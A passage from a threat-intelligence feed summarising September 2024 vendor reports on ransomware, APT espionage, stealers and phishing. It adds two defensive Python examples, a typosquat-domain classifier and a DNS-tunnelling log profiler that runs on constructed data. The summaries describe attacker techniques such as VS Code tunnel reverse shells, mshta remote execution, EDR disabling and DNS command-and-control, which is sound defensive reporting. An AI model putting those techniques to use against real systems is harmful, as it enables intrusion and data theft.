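Both the Sekoia Olympics entry above and this Zscaler entry turn on the same thing: registered domains that look like a brand's legitimate domain. The following classifier is an added example written for this page, not Sekoia's or Zscaler's code; given a small brand list (the mapping of brand to legitimate domain is assumed for the example, as is paris2024.org for the Olympics), it folds homoglyphs and digit-for-letter swaps, decodes punycode labels, and tells apart exact homoglyph clones, one-or-two-edit typos, brand-plus-word combosquats and brand names hidden in a subdomain. The registrable-domain extraction takes the last two labels, a simplification that a real deployment would replace with the Public Suffix List.

```python
import unicodedata

# Brand keyword -> legitimate registrable domain. Assumed for this example.
BRANDS = {
    "google": "google.com",
    "microsoft": "microsoft.com",
    "amazon": "amazon.com",
    "paris2024": "paris2024.org",
}

# Single characters that typosquatters swap for a Latin letter: Cyrillic
# look-alikes and digits. Applied to brand names and candidate labels alike,
# so a brand that itself contains digits still compares consistently.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0131": "i",
    "0": "o", "1": "l", "3": "e", "5": "s", "8": "b",
}
# Two-letter sequences that read as one letter in most fonts.
MULTI_CONFUSABLES = {"rn": "m", "vv": "w"}


def decode_host(host: str) -> str:
    """Lower-case a hostname and decode any punycode (xn--) labels to Unicode."""
    labels = []
    for label in host.strip().rstrip(".").lower().split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass                      # leave malformed punycode as-is
        labels.append(label)
    return ".".join(labels)


def normalize_label(label: str) -> str:
    """Fold accents, confusable scripts and digit substitutions into plain ASCII letters."""
    folded = unicodedata.normalize("NFKD", label.lower())
    folded = "".join(ch for ch in folded if not unicodedata.combining(ch))
    folded = "".join(CONFUSABLES.get(ch, ch) for ch in folded)
    for seq, rep in MULTI_CONFUSABLES.items():
        folded = folded.replace(seq, rep)
    return folded


def levenshtein(a: str, b: str) -> int:
    """Edit distance with insert/delete/substitute each costing 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host: str) -> dict:
    """Return the brand a hostname resembles and how: legitimate, homoglyph,
    typosquat, combosquat, brand_in_subdomain or unrelated."""
    host = decode_host(host)
    labels = host.split(".")
    if len(labels) < 2:
        return {"host": host, "brand": None, "verdict": "unrelated"}
    registrable = ".".join(labels[-2:])           # simplification: no Public Suffix List
    sld_norm = normalize_label(labels[-2])
    for brand, legit in BRANDS.items():
        if registrable == legit:
            return {"host": host, "brand": brand, "verdict": "legitimate"}
        brand_norm = normalize_label(brand)
        distance = levenshtein(sld_norm, brand_norm)
        if distance == 0:                          # reads as the brand, but is a different domain
            return {"host": host, "brand": brand, "verdict": "homoglyph"}
        if distance <= (1 if len(brand) < 8 else 2):
            return {"host": host, "brand": brand, "verdict": "typosquat"}
        if brand_norm in sld_norm:                  # e.g. microsoft-login.com
            return {"host": host, "brand": brand, "verdict": "combosquat"}
        if any(brand_norm in normalize_label(l) for l in labels[:-2]):
            return {"host": host, "brand": brand, "verdict": "brand_in_subdomain"}
    return {"host": host, "brand": None, "verdict": "unrelated"}


if __name__ == "__main__":
    # Constructed candidates; none of these are domains from the reports.
    for candidate in ["google.com", "g00gle.com", "rnicrosoft.com", "amazom.com",
                      "microsoft-login.com", "google.com.evil-site.net", "paris-2024.org"]:
        print(f"{candidate:32} {classify(candidate)['verdict']}")
```

The edit-distance threshold scales with brand length (one edit for short names, two for longer ones) so that a six-letter brand does not collect every unrelated six-letter word. Homoglyph detection compares the folded label but the raw registrable domain, which is what makes `g00gle.com` a clone rather than a legitimate match.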
2024-09-11
Tracking_Ransomware_Through_Code_Similarities
LOW
+
Intel Source:
Emanuele De Lucia
Intel Name:
Tracking_Ransomware_Through_Code_Similarities
Date of Scan:
2024-09-11
Impact:
LOW
Summary:
Emanuele De Lucia has described a method for tracking ransomware groups by examining code similarities among malware samples. The analysis shows how shared code can link different ransomware samples, helping researchers follow the activity of the groups behind them.
Source: https://www.emanueledelucia.net/malwares-shared-secrets-code-similarity-insights-for-ransomware-gangs-activities-tracking/
2024-09-11
Phishing_Site_Mimics_CapCut_to_Distribute_Malware
LOW
+
Intel Source:
Cyble
Intel Name:
Phishing_Site_Mimics_CapCut_to_Distribute_Malware
Date of Scan:
2024-09-11
Impact:
LOW
Summary:
Cyble researchers have discovered a phishing site posing as a CapCut download page that tricks users into downloading malware. The attackers use a reputation-hijacking technique, embedding a legitimately signed CapCut application in the malicious download so that its established reputation helps the package bypass Windows Smart App Control (SAC); the legitimate JamPlus build utility is abused as part of this chain.
Source: https://cyble.com/blog/reputation-hijacking-with-jamplus-a-maneuver-to-bypass-smart-app-control-sac/
2024-09-11
Iranian_Attacks_Against_Government_Infrastructure
MEDIUM
+
Intel Source:
Check Point
Intel Name:
Iranian_Attacks_Against_Government_Infrastructure
Date of Scan:
2024-09-11
Impact:
MEDIUM
Summary:
Check Point Research has uncovered a targeted cyberattack against Iraqi government infrastructure involving new malware strains named Veaty and Spearal. The toolset uses DNS tunneling and command-and-control over compromised email accounts, along with a passive IIS backdoor and custom protocols. The malware shows strong ties to previously identified APT34 families such as Karkoff, Saitama and IIS Group 2, pointing to Iranian threat actors affiliated with the Ministry of Intelligence and Security (MOIS).
Source: https://research.checkpoint.com/2024/iranian-malware-attacks-iraqi-government/
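DNS tunneling, one of the channels named above, hides command-and-control data in the labels of DNS queries, so it shows up in resolver logs as a stream of long, high-entropy, never-repeating subdomains under one parent domain. The profiler below is an added example for this entry, not Check Point's code and not derived from the Veaty or Spearal samples; it builds a small constructed query log (hex-encoded chunks under a fictitious parent, mixed with ordinary lookups), aggregates per parent domain, and flags domains whose subdomains are numerous, long and high-entropy. The log format and the thresholds are assumptions made for the example.

```python
import hashlib
import math
from collections import Counter, defaultdict


def build_sample_log() -> str:
    """Constructed log lines: "<timestamp> <client> <qtype> <qname>". Not real traffic."""
    lines = []
    ordinary = ["www.example.com", "mail.example.com", "api.example.com",
                "cdn.example.com", "www.example.com"]
    for i, name in enumerate(ordinary):
        lines.append(f"2024-09-11T10:00:{i:02d}Z 10.0.0.5 A {name}")
    # Tunnel traffic: each query carries a 40-hex-char chunk plus a sequence label.
    for i in range(25):
        chunk = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40]
        qtype = "TXT" if i % 2 else "A"
        lines.append(f"2024-09-11T10:01:{i:02d}Z 10.0.0.5 {qtype} {chunk}.s{i}.c2-relay.test")
    return "\n".join(lines)


def shannon_entropy(text: str) -> float:
    """Bits per character; hex-encoded data approaches 4.0, ordinary words sit well below 3."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (subdomain, parent) using the last two labels as the parent.
    Simplification: a real deployment would consult the Public Suffix List."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 3:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def profile_domains(log_text: str, min_unique=10, min_len=25.0, min_entropy=3.5) -> dict:
    """Aggregate queries per parent domain and flag tunnel-like behaviour."""
    seen = defaultdict(lambda: {"queries": 0, "subdomains": set(), "lens": [], "ents": [], "txt": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                                  # skip malformed lines
        _, _, qtype, qname = parts
        sub, parent = split_name(qname)
        rec = seen[parent]
        rec["queries"] += 1
        rec["subdomains"].add(sub)
        body = sub.replace(".", "")                   # measure the payload-bearing part only
        rec["lens"].append(len(body))
        rec["ents"].append(shannon_entropy(body))
        rec["txt"] += qtype.upper() == "TXT"
    profiles = {}
    for parent, rec in seen.items():
        n = rec["queries"]
        prof = {
            "queries": n,
            "unique_subdomains": len(rec["subdomains"]),
            "mean_sub_len": sum(rec["lens"]) / n,
            "mean_entropy": sum(rec["ents"]) / n,
            "txt_ratio": rec["txt"] / n,
        }
        # All three must hold: many distinct names, long labels, random-looking content.
        prof["flagged"] = (prof["unique_subdomains"] >= min_unique
                           and prof["mean_sub_len"] >= min_len
                           and prof["mean_entropy"] >= min_entropy)
        profiles[parent] = prof
    return profiles


if __name__ == "__main__":
    for parent, prof in profile_domains(build_sample_log()).items():
        print(parent, prof)
```

The TXT ratio is reported but not used in the verdict: TXT-heavy tunnels are common, but A/AAAA-only tunnels exist too, so length, entropy and cardinality carry the decision. In a real resolver feed the per-domain aggregation would be windowed by time and the parent-domain allow-listed for CDNs and telemetry services that legitimately produce long random labels.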
2024-09-10
Rising_Threat_from_Repellent_Scorpius_Ransomware
LOW
+
Intel Source:
Palo Alto
Intel Name:
Rising_Threat_from_Repellent_Scorpius_Ransomware
Date of Scan:
2024-09-10
Impact:
LOW
Summary:
Palo Alto Networks researchers have identified Repellent Scorpius, a new ransomware-as-a-service (RaaS) operation distributing the Cicada3301 ransomware, first observed in May 2024. The gang uses multiple extortion methods. The Unit 42 report describes the ransomware in detail and provides insight into the group's methods and its prior involvement in data theft.
Source: https://unit42.paloaltonetworks.com/repellent-scorpius-cicada3301-ransomware/
2024-09-10
Revealing_North_Korean_Cyber_Groups
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Revealing_North_Korean_Cyber_Groups
Date of Scan:
2024-09-10
Impact:
MEDIUM
Summary:
Researchers from Palo Alto Networks have profiled the multiple North Korean threat groups collectively referred to as Lazarus, all of which report to North Korea's Reconnaissance General Bureau (RGB). The researchers distinguish six sub-groups: Bluenoroff, Citrine Sleet, Andariel, TEMP.Hermit, TraderTraitor and Kimsuky, each using distinct malware for its own operations. These groups build specialized malware for all major operating systems, including Windows, macOS and Linux.
Source: https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/
2024-09-10
Quad7_Update
MEDIUM
+
Intel Source:
Sekoia
Intel Name:
Quad7_Update
Date of Scan:
2024-09-10
Impact:
MEDIUM
Summary:
The Sekoia TDR team has uncovered new developments in the activities of the Quad7 botnet operators, revealing the use of compromised routers and VPN appliances, including brands like TP-Link, Zyxel, and Asus. Exploiting both known and previously unknown vulnerabilities, the operators have been evolving their toolset, introducing new backdoors and exploring advanced communication protocols like KCP. These changes indicate efforts to enhance stealth and evade detection, potentially making future tracking of Quad7's botnets difficult without interception capabilities.
Source: https://blog.sekoia.io/a-glimpse-into-the-quad7-operators-next-moves-and-associated-botnets/
2024-09-10
Scattered_Spider_Update
MEDIUM
+
Intel Source:
EclecticIQ
Intel Name:
Scattered_Spider_Update
Date of Scan:
2024-09-10
Impact:
MEDIUM
Summary:
EclecticIQ analysts have shared updates on SCATTERED SPIDER, a sophisticated cybercriminal group that remains a key threat to cloud infrastructure in the insurance and financial sectors. Using social engineering such as phishing, smishing and SIM swapping, the group targets cloud platforms and identity administrators to gain unauthorized access to highly privileged accounts. SCATTERED SPIDER is known for purchasing stolen credentials and abusing cloud-native tools to maintain persistence while avoiding detection. Its collaboration with ransomware groups such as BlackCat/ALPHV has amplified its impact, making it a significant threat to Western organizations through the compromise of their cloud environments.
Source: https://blog.eclecticiq.com/ransomware-in-the-cloud-scattered-spider-targeting-insurance-and-financial-industries
2024-09-10
RansomHub_Uses_TDSSKiller_and_LaZagne_in_New_Attack
LOW
+
Intel Source:
Malwarebytes
Intel Name:
RansomHub_Uses_TDSSKiller_and_LaZagne_in_New_Attack
Date of Scan:
2024-09-10
Impact:
LOW
Summary:
Malwarebytes researchers have identified a new attack by the RansomHub ransomware group that relies on two tools: TDSSKiller, a legitimate Kaspersky rootkit-removal utility abused here to disable endpoint detection and response (EDR) software, and LaZagne, which harvests stored credentials. While both tools have been available for years, this is the first time RansomHub has been seen using them.
Source: https://www.threatdown.com/blog/new-ransomhub-attack-uses-tdskiller-and-lazagne-disables-edr/
2024-09-10
ScRansom_Ransomware_And_CosmicBeetle_Updates
LOW
+
Intel Source:
ESET
Intel Name:
ScRansom_Ransomware_And_CosmicBeetle_Updates
Date of Scan:
2024-09-10
Impact:
LOW
Summary:
According to ESET researchers, the CosmicBeetle group is now deploying ScRansom, a new ransomware that replaces its older Scarab-based encryptor. The group mostly targets small and medium-sized businesses around the world, exploiting old, unpatched vulnerabilities. CosmicBeetle has also experimented with the leaked LockBit builder to appear more credible. ESET believes CosmicBeetle may be a new affiliate of RansomHub, a ransomware gang operating since March 2024.
Source: https://www.welivesecurity.com/en/eset-research/cosmicbeetle-steps-up-probation-period-ransomhub/
2024-09-09
Loki_Private_Agent_for_Mythic_Framework
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Loki_Private_Agent_for_Mythic_Framework
Date of Scan:
2024-09-09
Impact:
MEDIUM
Summary:
Researchers from Securelist have discovered Loki, a new private agent for the Mythic framework. It is derived from another tool, Havoc. Loki uses similar evasion techniques, such as encrypting its memory and performing indirect system calls. Unlike Havoc, however, Loki is split into two parts: a loader and a DLL that contains most of the malicious functionality.
Source: https://securelist.com/loki-agent-for-mythic/113596/
2024-09-09
Stately_Taurus_Targets_Government_Entities
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Stately_Taurus_Targets_Government_Entities
Date of Scan:
2024-09-09
Impact:
MEDIUM
Summary:
Researchers from Palo Alto Networks have discovered that the Chinese APT group Stately Taurus is abusing Visual Studio Code to conduct cyberespionage against Southeast Asian government agencies. The group obtains a reverse shell through the software's built-in remote tunnel feature, the first time this technique has been observed in a real-world attack.
Source: https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/
2024-09-09
BLX_Stealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
BLX_Stealer
Date of Scan:
2024-09-09
Impact:
LOW
Summary:
Cyfirma researchers have identified BLX Stealer, also known as XLABB Stealer, which steals sensitive information from compromised systems, including login credentials, browser data, cryptocurrency wallets and data from gaming platforms such as Steam and Riot Games. It is advertised on Telegram and Discord in both free and premium versions. The malware establishes persistence by copying itself into the system's Startup folder so that it runs every time the computer restarts, and it exfiltrates stolen data to the attackers through Discord webhooks.
Source: https://www.cyfirma.com/research/blx-stealer/
2024-09-09
Earth_Preta_Upgrades_Malware_Tactics
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Earth_Preta_Upgrades_Malware_Tactics
Date of Scan:
2024-09-09
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have observed that Earth Preta, a sophisticated threat group targeting the Asia-Pacific (APAC) region, has recently upgraded its attack strategies. Their enhanced tactics include the deployment of PUBLOAD via the HIUPAN worm and using tools like FDMTP and PTSOCKET to expand control and data exfiltration. These campaigns often feature spear-phishing emails with multi-stage downloaders such as DOWNBAIT and PULLBAIT, leading to further malware installations. The attacks are highly targeted, time-sensitive, and focused on specific countries and sectors within APAC, particularly government entities.
Source: https://www.trendmicro.com/en_no/research/24/i/earth-preta-new-malware-and-strategies.html
2024-09-09
ToneShell_Backdoor
LOW
+
Intel Source:
Hunt.IO
Intel Name:
ToneShell_Backdoor
Date of Scan:
2024-09-09
Impact:
LOW
Summary:
Researchers at Hunt.IO have identified a resurgence of the ToneShell backdoor, linked to the cyber espionage group Mustang Panda, in a campaign targeting attendees of the 2024 International Institute for Strategic Studies (IISS) Defence Summit in Prague. The primary goal of the campaign is to gain insight into sensitive discussions on military strategy, defense cooperation and geopolitical tensions. ToneShell has frequently been used against government organizations in Southeast and East Asia for cyber espionage.
Source: https://hunt.io/blog/toneshell-backdoor-used-to-target-attendees-of-the-iiss-defence-summit
2024-09-06
Exposing_New_Predator_Spyware_Infrastructure
LOW
+
Intel Source:
Recorded Future
Intel Name:
Exposing_New_Predator_Spyware_Infrastructure
Date of Scan:
2024-09-06
Impact:
LOW
Summary:
Researchers from Insikt Group have discovered new infrastructure and domains associated with the Predator spyware, most likely used for staging and exploitation. The discovery was based on network data, Recorded Future Network Intelligence and other indicators. The operators have added an extra layer to their multi-tiered delivery infrastructure to better conceal who is behind it, while also hardening their server configurations and associated domains.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0905.pdf
2024-09-06
TIDRONE_Threat_Cluster_Targets_Drone_Industry
LOW
+
Intel Source:
Trend Micro
Intel Name:
TIDRONE_Threat_Cluster_Targets_Drone_Industry
Date of Scan:
2024-09-06
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered that a previously unidentified threat cluster, tracked as TIDRONE, has shown strong interest in military-related companies, particularly drone manufacturers. TIDRONE, which is linked to Chinese-speaking groups, has attacked Taiwan's drone manufacturing industry. The actor abuses enterprise resource planning (ERP) software and remote desktop tools to deploy sophisticated malware toolsets such as CXCLNT and CLNTEND.
Source: https://www.trendmicro.com/en_us/research/24/i/tidrone-targets-military-and-satellite-industries-in-taiwan.html
2024-09-06
ShrinkLocker_Malware
MEDIUM
+
Intel Source:
Splunk
Intel Name:
ShrinkLocker_Malware
Date of Scan:
2024-09-06
Impact:
MEDIUM
Summary:
Splunk researchers have analyzed ShrinkLocker, a ransomware strain that abuses BitLocker, the legitimate Windows disk-encryption feature, to lock victims out of their data. ShrinkLocker shrinks existing partitions to create new boot partitions and then uses BitLocker to encrypt the drives, denying access unless a ransom is paid. The malware begins by identifying the operating system, deleting specific files and checking the domain name to ensure it is running on the intended target. It generates an encryption key from the system's configuration, sends it to a C2 server via a temporary Cloudflare domain, and deletes system logs, firewall rules and scheduled tasks to hamper detection and recovery.
Source: https://www.splunk.com/en_us/blog/security/shrinklocker-malware-abusing-bitlocker-to-lock-your-data.html
2024-09-06
Fake_Google_Ads_Target_Lowes_Employee_Logins
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Fake_Google_Ads_Target_Lowes_Employee_Logins
Date of Scan:
2024-09-06
Impact:
LOW
Summary:
Researchers from Malwarebytes have discovered phishing attempts targeting Lowe's employees through bogus Google ads. Lowe's runs an employee portal called MyLowesLife, where staff can view schedules, pay and benefits. When employees searched for "myloweslife", some were shown fake ads that led to lookalike websites. The attackers aimed to harvest login credentials from current and former Lowe's employees, and they appear to have targeted other companies in similar ways.
Source: https://www.malwarebytes.com/blog/news/2024/09/lowes-employees-phished-via-google-ads
2024-09-06
Phishing_Emails_Impersonating_Netflix
LOW
Intel Source:
ASEC
Intel Name:
Phishing_Emails_Impersonating_Netflix
Date of Scan:
2024-09-06
Impact:
LOW
Summary:
ASEC researchers have discovered that phishing emails impersonating Netflix are being distributed to trick users into updating their payment information. The email claims there is a payment failure on the subscription and urges the recipient to click a link to resolve the issue. The sender domain used by the threat actor, “netflix-team[.]com”, appears legitimate, and most of the links in the email, such as Help Center and Contact, lead to Netflix's official website, but the “Update account now” button takes users to a phishing site. The scammer takes advantage of Netflix’s popularity to deceive users into sharing their personal information.
Source: https://asec.ahnlab.com/en/82969/
2024-09-06
Atomic_macOS_Stealer
LOW
Intel Source:
Sophos
Intel Name:
Atomic_macOS_Stealer
Date of Scan:
2024-09-06
Impact:
LOW
Summary:
Sophos researchers have analyzed Atomic macOS Stealer (AMOS), which is designed to steal sensitive information such as cookies, passwords, autofill data and cryptocurrency wallet contents from infected macOS computers. It first appeared in April 2023. Stolen data, such as Apple Keychain data and macOS passwords, is often sold on underground forums. It spreads through malvertising and SEO poisoning, where threat actors manipulate search engine rankings to promote malicious websites. Attackers have even hosted AMOS on GitHub, and some of its control panels are protected with login credentials.
Source: https://news.sophos.com/en-us/2024/09/06/atomic-macos-stealer-leads-sensitive-data-theft-on-macos/
2024-09-06
LummaC2_Malware_and_Malicious_Chrome_Extension
LOW
Intel Source:
Esentire
Intel Name:
LummaC2_Malware_and_Malicious_Chrome_Extension
Date of Scan:
2024-09-06
Impact:
LOW
Summary:
Researchers at eSentire have identified a malware attack involving the LummaC2 stealer and a malicious Chrome extension called Save to Google Drive. The attack starts with a drive-by download of a ZIP file containing an MSI installer, which connects to a C2 server to retrieve and extract a malicious DLL file. The Chrome extension targets users of platforms like Facebook, Coinbase and Google Pay to execute financial transactions such as cryptocurrency withdrawals. It also collects browser and device information, manipulates emails and captures screenshots. The malicious extension can alter browser behavior, divert user interactions and exploit the victim’s browser sessions for further attacks.
Source: https://www.esentire.com/blog/lummac2-malware-and-malicious-chrome-extension-delivered-via-dll-side-loading
2024-09-06
Gamaredon_Targets_Ukrainian_Military_via_LNK_Files
MEDIUM
Intel Source:
Cyble
Intel Name:
Gamaredon_Targets_Ukrainian_Military_via_LNK_Files
Date of Scan:
2024-09-06
Impact:
MEDIUM
Summary:
Researchers from Cyble have discovered an active Gamaredon campaign that uses spear-phishing emails to target Ukrainian military personnel. These emails include malicious XHTML attachments that, when opened, run obfuscated JavaScript code and download a malicious archive to the victim's machine. This archive contains a Windows shortcut (LNK) file that, when triggered, starts the execution of a remote .tar archive hosted on TryCloudflare[.]com using mshta.exe.
Source: https://cyble.com/blog/gamaredons-spear-phishing-assault-on-ukraines-military/
2024-09-05
BlindEagle_Targets_Colombian_Insurance_Sector
LOW
Intel Source:
Zscaler
Intel Name:
BlindEagle_Targets_Colombian_Insurance_Sector
Date of Scan:
2024-09-05
Impact:
LOW
Summary:
Researchers at Zscaler have identified a phishing campaign in which the threat actor BlindEagle, also known as AguilaCiega, APT-C-36 and APT-Q-98, is targeting the Colombian insurance sector to steal payment-related information. The attack starts with a phishing email containing a PDF and a URL leading to a ZIP file. The ZIP file is hosted on a compromised Google Drive account linked to a regional government in Colombia, and when the user downloads it, the malware called BlotchyQuasar is delivered to infect the user’s system. This group also targets government and finance organisations in Ecuador, deploying AsyncRAT and Remcos RAT to steal banking credentials.
Source: https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-insurance-sector-blotchyquasar
2024-09-05
PackXOR_Packer
LOW
Intel Source:
Harfang Lab
Intel Name:
PackXOR_Packer
Date of Scan:
2024-09-05
Impact:
LOW
Summary:
HarfangLab researchers have analyzed the inner workings of the PackXOR packer and its unpacking tool in detail. While PackXOR is linked to the AvNeutralizer tool, which is used to disable EDR software and is sold on underground forums by individuals connected to the FIN7 group, its usage extends beyond FIN7. PackXOR has also been employed to protect unrelated payloads, such as the XMRig cryptominer and the SilentCryptoMiner obfuscator, which are not aligned with FIN7's known tactics. This suggests that while PackXOR's developers may be associated with FIN7, the packer is also used for activities outside of FIN7's operations.
Source: https://harfanglab.io/insidethelab/unpacking-packxor/
2024-09-05
Russian_Threat_Actors_Target_Global_Infrastructure
MEDIUM
Intel Source:
CISA
Intel Name:
Russian_Threat_Actors_Target_Global_Infrastructure
Date of Scan:
2024-09-05
Impact:
MEDIUM
Summary:
A joint advisory has been issued by the FBI, CISA and NSA stating that cyber actors associated with Russia's GRU Unit 29155 have been responsible for computer network operations against global organizations for espionage, sabotage and reputational harm since at least 2020. These cyber actors have been using destructive malware like WhisperGate against Ukrainian organizations since January 2022. They are also targeting NATO countries, Europe, Latin America and Central Asia, conducting activities such as defacing websites, scanning infrastructure, stealing data and leaking it online. Their primary focus is on targeting and disrupting efforts to provide aid to Ukraine. Unit 29155 is also known for targeting critical sectors like government services, financial services, transportation, energy and healthcare.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a
2024-09-05
Exploitation_of_GeoServer_Vulnerability
MEDIUM
Intel Source:
Fortinet
Intel Name:
Exploitation_of_GeoServer_Vulnerability
Date of Scan:
2024-09-05
Impact:
MEDIUM
Summary:
Fortinet researchers have identified a critical vulnerability (CVE-2024-36401) in GeoServer, an open-source platform for sharing and editing geospatial data, that allows remote code execution by unauthorized users. The vulnerability has been actively exploited by attackers through GOREVERSE malware and various botnets such as Mirai and Condi to carry out DDoS attacks. Attackers exploited the flaw to target industries in India, the U.S., Belgium, Thailand and Brazil. They also leveraged tools like Fast Reverse Proxy (FRP) to create encrypted tunnels, enabling them to maintain persistence in compromised environments.
Source: https://www.fortinet.com/blog/threat-research/threat-actors-exploit-geoserver-vulnerability-cve-2024-36401
2024-09-05
Fog_Ransomware_Targets_Financial_Entities
MEDIUM
Intel Source:
Adlumin
Intel Name:
Fog_Ransomware_Targets_Financial_Entities
Date of Scan:
2024-09-05
Impact:
MEDIUM
Summary:
Adlumin researchers have analyzed Fog ransomware, which first emerged in 2021. This group primarily targets sectors like education and recreation but has recently expanded to the financial services industry. The attackers use compromised VPN credentials and pass-the-hash attacks to gain administrative access. Fog marks encrypted files with the [.]FOG or [.]FLOCKED extension and leaves a ransom note with instructions to negotiate on the Tor network. In a recent attack on a financial services company, Adlumin identified a breach originating from a Russian IP address. The attackers used a compromised service account to scan the network, steal login credentials and map shared drives. They used a tool called Rclone to transfer data and deployed ransomware to encrypt files across the network.
Source: https://adlumin.com/post/fog-ransomware-now-targeting-the-financial-sector/
2024-09-05
Banking_Trojans_Surge_in_Latin_America
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Banking_Trojans_Surge_in_Latin_America
Date of Scan:
2024-09-05
Impact:
MEDIUM
Summary:
Trend Micro researchers have observed recent developments in banking trojans, specifically Mekotio and BBTok. Mekotio's latest variant suggests that its creators are broadening their attack scope, while BBTok abuses MSBuild.exe to evade detection. The investigation indicates a rise in phishing scams targeting Latin American users. The cybercriminals behind these trojans are increasingly using judicial-themed phishing emails in addition to traditional business lures. Investigations suggest that the reach of Mekotio may soon extend beyond Latin America.
Source: https://www.trendmicro.com/en_no/research/24/i/banking-trojans-mekotio-looks-to-expand-targets--bbtok-abuses-ut.html
2024-09-05
Tusk_Campaign_Targets_with_Phishing_and_Malware
LOW
Intel Source:
Securelist
Intel Name:
Tusk_Campaign_Targets_with_Phishing_and_Malware
Date of Scan:
2024-09-05
Impact:
LOW
Summary:
Researchers from Kaspersky Lab have discovered an advanced campaign known as "Tusk," which is run by Russian-speaking cybercriminals. The campaign is made up of multiple smaller operations that imitate genuine projects, with only minor changes to branding and names. The attackers win victims' trust through social media and use Dropbox to host malicious files that deliver malware such as DanaBot and StealC.
Source: https://securelist.ru/tusk-infostealers-campaign/110460/
2024-09-05
Tropic_Trooper_Spies_on_Middle_Eastern_Governments
MEDIUM
Intel Source:
Securelist
Intel Name:
Tropic_Trooper_Spies_on_Middle_Eastern_Governments
Date of Scan:
2024-09-05
Impact:
MEDIUM
Summary:
Researchers at Securelist discovered new DLL search-order hijacking implants that are loaded by a legitimate, vulnerable executable because it does not specify the full path to the DLL it requires. The goal of this attack chain was to load the Crowdoor loader, whose name is partly derived from the SparrowDoor backdoor. When the security agent stopped the initial Crowdoor loader during the attack, the attackers were forced to switch to a new, undisclosed variant that had nearly the same effect.
Source: https://securelist.com/new-tropic-trooper-web-shell-infection/113737/
2024-09-04
Lazarus_Group_Targets_Job_Seeker
MEDIUM
Intel Source:
Group-IB
Intel Name:
Lazarus_Group_Targets_Job_Seeker
Date of Scan:
2024-09-04
Impact:
MEDIUM
Summary:
Group-IB researchers have uncovered a campaign called Contagious Interview, executed by the Lazarus Group, which targets job seekers. This campaign tricks users into downloading malicious software containing the BeaverTail malware, which has versions for both macOS and Windows and can deliver a Python backdoor known as InvisibleFerret. The group has expanded its reach beyond LinkedIn to other platforms such as WWR, Moonlight and Upwork to lure blockchain professionals. They often move the conversation to Telegram, where they ask interviewees to download a video conferencing app or a Node.js project to perform a technical task as part of the interview process. The group has also cloned legitimate video conferencing apps such as FCCCall, using fake websites like freeconference[.]io to infect victims.
Source: https://www.group-ib.com/blog/apt-lazarus-python-scripts/
2024-09-04
August24_Malspam_Campaigns
MEDIUM
Intel Source:
James_inthe_box
Intel Name:
August24_Malspam_Campaigns
Date of Scan:
2024-09-04
Impact:
MEDIUM
Summary:
August 2024 Malspam Campaigns
Source: https://gist.github.com/silence-is-best/252f23cff687506a22f36b6286794b23
2024-09-04
Mallox_Ransomware
MEDIUM
Intel Source:
Securelist
Intel Name:
Mallox_Ransomware
Date of Scan:
2024-09-04
Impact:
MEDIUM
Summary:
Researchers at Securelist have profiled the ransomware group called Mallox, which first appeared in 2021. This group operates as a Ransomware-as-a-Service (RaaS) and uses complex encryption methods to lock victims' files. The ransomware communicates with a C2 server and deploys the Remcos RAT for remote access, using PowerShell scripts to download and execute its ransomware payload. The group runs a data leak site where it publishes stolen data if the ransom is not paid. Brazil, Vietnam and China are the primary targets of Mallox ransomware, although its affiliates attack companies globally.
Source: https://securelist.com/mallox-ransomware/113529/
2024-09-04
Taliban_Stealer
LOW
Intel Source:
Cyfirma
Intel Name:
Taliban_Stealer
Date of Scan:
2024-09-04
Impact:
LOW
Summary:
Researchers at Cyfirma have identified a website advertising a tool named Taliban Stealer. Once executed, the tool lets the user choose which types of data to extract from the machine, including passwords, cookies and cryptocurrency wallets. Additionally, it installs various other generic malware, modifies Windows Defender settings to exclude specific directories, bypasses the PowerShell execution policy and performs a CMSTP-based UAC bypass.
Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_cyfirma-researchers-have-discovered-a-website-activity-7236694013284691968-M6LO/?utm_source=share&utm_medium=member_ios
2024-09-04
Analysing_KTLVdoor_Backdoor
LOW
Intel Source:
Trend Micro
Intel Name:
Analysing_KTLVdoor_Backdoor
Date of Scan:
2024-09-04
Impact:
LOW
Summary:
Researchers from Trend Micro have found a new multiplatform backdoor called KTLVdoor, which was created by the Chinese-speaking threat actor Earth Lusca. This malware is written in Golang and targets both Microsoft Windows and Linux systems. KTLVdoor is heavily obfuscated and disguises itself as system processes, allowing attackers to perform file modification, command execution and remote port scanning.
Source: https://www.trendmicro.com/en_us/research/24/i/earth-lusca-ktlvdoor.html
2024-09-04
The_Examination_of_Web3_Heists
LOW
Intel Source:
Google/Mandiant
Intel Name:
The_Examination_of_Web3_Heists
Date of Scan:
2024-09-04
Impact:
LOW
Summary:
